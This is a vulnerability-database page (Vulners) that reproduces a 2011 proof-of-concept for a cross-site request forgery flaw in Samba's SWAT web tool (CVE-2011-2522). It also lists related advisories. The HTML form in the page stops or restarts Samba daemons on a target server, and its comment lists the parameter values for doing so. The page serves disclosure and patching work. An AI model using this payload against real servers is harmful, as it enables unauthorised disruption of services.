Vulners
Lucene search
SWAT Samba Web Administration Tool Cross-Site Request Forgery PoC
| Reporter | Title | Published | Views | Family All 135 |
|---|---|---|---|---|
 | SWAT Samba Web Administration Tool Cross-Site Request Forgery PoC | 27 Jul 201100:00 | – | zdt |
 | Samba -- cross site scripting and request forgery vulnerabilities | 27 Jul 201100:00 | – | freebsd |
 | Security fix for the ALT Linux 6 package samba version 3.5.10-alt1 | 28 Jul 201100:00 | – | altlinux |
 | Samba 3.x < 3.3.16 / 3.4.14 / 3.5.10 Multiple Vulnerabilities | 9 Jun 201600:00 | – | nessus |
| CentOS 4 / 5 : samba (CESA-2011:1219) | 30 Aug 201100:00 | – | nessus |
| CentOS 5 : samba3x (CESA-2011:1220) | 23 Sep 201100:00 | – | nessus |
| Debian DSA-2290-1 : samba - XSS | 8 Aug 201100:00 | – | nessus |
| Fedora 15 : samba-3.5.11-71.fc15.1 (2011-10341) | 17 Aug 201100:00 | – | nessus |
| Fedora 14 : samba-3.5.11-79.fc14 (2011-10367) | 17 Aug 201100:00 | – | nessus |
| FreeBSD : Samba -- XSS and request forgery vulnerabilities (56f4b3a6-c82c-11e0-a498-00215c6a37bb) | 17 Aug 201100:00 | – | nessus |
10
<!--
# Secur-I Research Group - Proof-of-Concept
# ==========================================================================
# Title: Cross-Site Request Forgery in SWAT (Samba Web Administration Tool)
# Vulnerable versions: Samba 3.0.x - 3.5.9 (inclusive)
# Fixed version: Samba 3.5.10
# Product Homepage: http://www.samba.org/
# CVE-ID: CVE-2011-2522
# References: http://www.samba.org/samba/security/CVE-2011-2522
# ==========================================================================
-->
<html>
<body>
<form method=post action="http://VULN_SERVER:901/status">
<input type=submit onclick=window.open("http://securview.com") name="VUL_PARM" value="w00t!">
</body>
</html>
<!--
VUL_PARM could be one of the following:-
smbd_start, smbd_stop, smbd_restart : To start/stop/restart smbd(Samba) daemon
nmbd_start, nmbd_stop, nmbd_restart : To start/stop/restart nmbd(NETBIOS) daemon
winbindd_start, winbindd_stop, winbindd_restart : To start/stop/restart winbindd(Windows Name Service Switch) daemon
-->
Thanks & Regards,
Narendra.
Confidentiality: This e-mail and any attachments may be confidential and may also be privileged. If you are not an intended named recipient, please notify the sender immediately and do not disclose the contents to another person use it for any purpose, or store or copy the information in any medium.
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jul 2011 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.17507